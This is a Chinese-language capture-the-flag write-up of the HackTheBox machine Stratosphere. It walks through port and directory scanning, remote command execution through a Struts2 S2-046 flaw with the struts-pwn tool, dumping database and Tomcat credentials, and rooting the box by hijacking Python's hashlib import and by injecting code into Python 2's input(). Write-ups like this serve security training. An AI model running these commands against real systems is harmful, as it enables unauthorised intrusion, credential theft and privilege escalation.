端口扫描

┌──(mikannse㉿kali)-[~/HTB/Stratosphere]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 23:42 CST
Nmap scan report for 10.10.10.64
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 21.91 seconds
┌──(mikannse㉿kali)-[~/HTB/Stratosphere]
└─$ sudo nmap -sT -sC -sV -O -p22,80,8080 10.10.10.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 23:46 CST
Nmap scan report for 10.10.10.64
Host is up (0.068s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u3 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
| 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (ED25519)
80/tcp open http
|_http-title: Stratosphere
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Accept-Ranges: bytes
<SNIP>
8080/tcp open http-proxy
|_http-title: Stratosphere
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
<SNIP>
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X (97%)
OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.32
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 - 5.5 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.29 seconds
┌──(mikannse㉿kali)-[~/HTB/Stratosphere]
└─$ sudo nmap --script=vuln -p22,80,8080 10.10.10.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 23:50 CST
Nmap scan report for 10.10.10.64
Host is up (0.067s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /manager/html/upload: Apache Tomcat (401 )
|_ /manager/html: Apache Tomcat (401 )
8080/tcp open http-proxy
| http-enum:
| /manager/html/upload: Apache Tomcat (401 )
|_ /manager/html: Apache Tomcat (401 )

Nmap done: 1 IP address (1 host up) scanned in 247.21 seconds

tomcat?不过/manager确实是tomcat的目录

Stucts2

80和8080端口事一样的,有一个/manager,但是需要凭证,这个门户网站可以说是毫无漏洞了,扫一下目录

┌──(mikannse㉿kali)-[~/HTB/Stratosphere]
└─$ gobuster dir -u http://10.10.10.64 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.64
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/manager (Status: 302) [Size: 0] [--> /manager/]
/Monitoring (Status: 302) [Size: 0] [--> /Monitoring/]
/http%3A%2F%2Fwww (Status: 400) [Size: 813]

除了manager还有一个/Monitoring,访问之后被重定向到了/Monitoring/example/Welcome.action,登陆界面也是,很明显是structs2框架

记得在vulhub中有打过,直接掏出综合利用工具

┌──(mikannse㉿kali)-[~/tools/web/java/Struts2-Scan]
└─$ python Struts2Scan.py -u http://10.10.10.64/Monitoring/example/Welcome.action

____ _ _ ____ ____
/ ___|| |_ _ __ _ _| |_ ___|___ \ / ___| ___ __ _ _ __
\___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \
___) | |_| | | |_| | |_\__ \/ __/ ___) | (_| (_| | | | |
|____/ \__|_| \__,_|\__|___/_____| |____/ \___\__,_|_| |_|

Author By HatBoy

[+] 正在扫描URL:http://10.10.10.64/Monitoring/example/Welcome.action
[*] ----------------results------------------
[*] http://10.10.10.64/Monitoring/example/Welcome.action 存在漏洞: S2-046

是能够直接RCE的: https://github.com/mazen160/struts-pwn

┌──(mikannse㉿kali)-[~/tools/web/java/struts-pwn]
└─$ python struts-pwn.py -u http://10.10.10.64:8080/Monitoring/example/Welcome.action -c id

[*] URL: http://10.10.10.64:8080/Monitoring/example/Welcome.action
[*] CMD: id
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ("Connection broken: InvalidChunkLength(got length b'', 0 bytes read)", InvalidChunkLength(got length b'', 0 bytes read))
Note: Server Connection Closed Prematurely

uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)

[%] Done.

做一个反弹shell,

数据库文件

[ssn]
user=ssn_admin
pass=AWs64@on*&

[users]
user=admin
pass=admin

tomcat的user.xml

<user username="teampwner" password="cd@6sY{f^+kZV8J!+o*t|<fpNy]F_(Y$" roles="manager-gui,admin-gui"

然而做不了反弹shell也上不了manager,还有一个开在本机的mysql,用得到的凭证看一下数据

┌──(mikannse㉿kali)-[~/tools/web/java/struts-pwn]
└─$ python struts-pwn.py -u http://10.10.10.64:8080/Monitoring/example/Welcome.action -c 'mysql -uadmin -padmin -e "show databases;"'

[*] URL: http://10.10.10.64:8080/Monitoring/example/Welcome.action
[*] CMD: mysql -uadmin -padmin -e "show databases;"
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ("Connection broken: InvalidChunkLength(got length b'', 0 bytes read)", InvalidChunkLength(got length b'', 0 bytes read))
Note: Server Connection Closed Prematurely

Database
information_schema
users

[%] Done.
┌──(mikannse㉿kali)-[~/tools/web/java/struts-pwn]
└─$ python struts-pwn.py -u http://10.10.10.64:8080/Monitoring/example/Welcome.action -c 'mysql -uadmin -padmin -e "use users;show tables;"'

[*] URL: http://10.10.10.64:8080/Monitoring/example/Welcome.action
[*] CMD: mysql -uadmin -padmin -e "use users;show tables;"
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ("Connection broken: InvalidChunkLength(got length b'', 0 bytes read)", InvalidChunkLength(got length b'', 0 bytes read))
Note: Server Connection Closed Prematurely

Tables_in_users
accounts

[%] Done.
┌──(mikannse㉿kali)-[~/tools/web/java/struts-pwn]
└─$ python struts-pwn.py -u http://10.10.10.64:8080/Monitoring/example/Welcome.action -c 'mysql -uadmin -padmin -e "use users;select * from accounts;"'

[*] URL: http://10.10.10.64:8080/Monitoring/example/Welcome.action
[*] CMD: mysql -uadmin -padmin -e "use users;select * from accounts;"
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ("Connection broken: InvalidChunkLength(got length b'', 0 bytes read)", InvalidChunkLength(got length b'', 0 bytes read))
Note: Server Connection Closed Prematurely

fullName password username
Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard

提权

得到账密能够ssh,能够sudo执行一个python脚本

richard@stratosphere:~$ sudo -l
Matching Defaults entries for richard on stratosphere:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on stratosphere:
(ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py
richard@stratosphere:~$ cat test.py 
#!/usr/bin/python3
import hashlib


def question():
q1 = input("Solve: 5af003e100c80923ec04d65933d382cb\n")
md5 = hashlib.md5()
md5.update(q1.encode())
if not md5.hexdigest() == "5af003e100c80923ec04d65933d382cb":
print("Sorry, that's not right")
return
print("You got it!")
q2 = input("Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff\n")
sha1 = hashlib.sha1()
sha1.update(q2.encode())
if not sha1.hexdigest() == 'd24f6fb449855ff42344feff18ee2819033529ff':
print("Nope, that one didn't work...")
return
print("WOW, you're really good at this!")
q3 = input("How about this? 91ae5fc9ecbca9d346225063f23d2bd9\n")
md4 = hashlib.new('md4')
md4.update(q3.encode())
if not md4.hexdigest() == '91ae5fc9ecbca9d346225063f23d2bd9':
print("Yeah, I don't think that's right.")
return
print("OK, OK! I get it. You know how to crack hashes...")
q4 = input("Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943\n")
blake = hashlib.new('BLAKE2b512')
blake.update(q4.encode())
if not blake.hexdigest() == '9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943':
print("You were so close! urg... sorry rules are rules.")
return

import os
os.system('/root/success.py')
return

question()

解密哈希的小游戏,前面几个跑在线网站都能出,最后一个需要指定一下哈希类型自己离线破解一下

┌──(mikannse㉿kali)-[~/HTB/Stratosphere]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-Blake2 hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-Blake2 [BLAKE2b 512 128/128 AVX])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Fhero6610 (?)
1g 0:00:00:01 DONE (2024-09-10 12:55) 0.9433g/s 10634Kp/s 10634Kc/s 10634KC/s Ganama25..DAKOTA31
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

然而被骗了,根本没有/root/success.py这个文件,改用在这个目录创建一个hashlib.py,因为python会查找这个脚本最近的库文件

richard@stratosphere:~$ echo "import os;os.system('/bin/bash')" >hashlib.py
richard@stratosphere:~$ sudo /usr/bin/python3.7 /home/richard/test.py
root@stratosphere:/home/richard# whoami
root

或者可以利用python2的input()函数漏洞python2中的input()等同于eval(raw_input()),所以也可以:

richard@stratosphere:~$ sudo /usr/bin/python2.7 /home/richard/test.py
Solve: 5af003e100c80923ec04d65933d382cb
__import__('os').system('/bin/bash')
root@stratosphere:/home/richard# whoami
root

碎碎念

算是第一次打struts2,后面部分还是比较简单的,java的洞还是得多打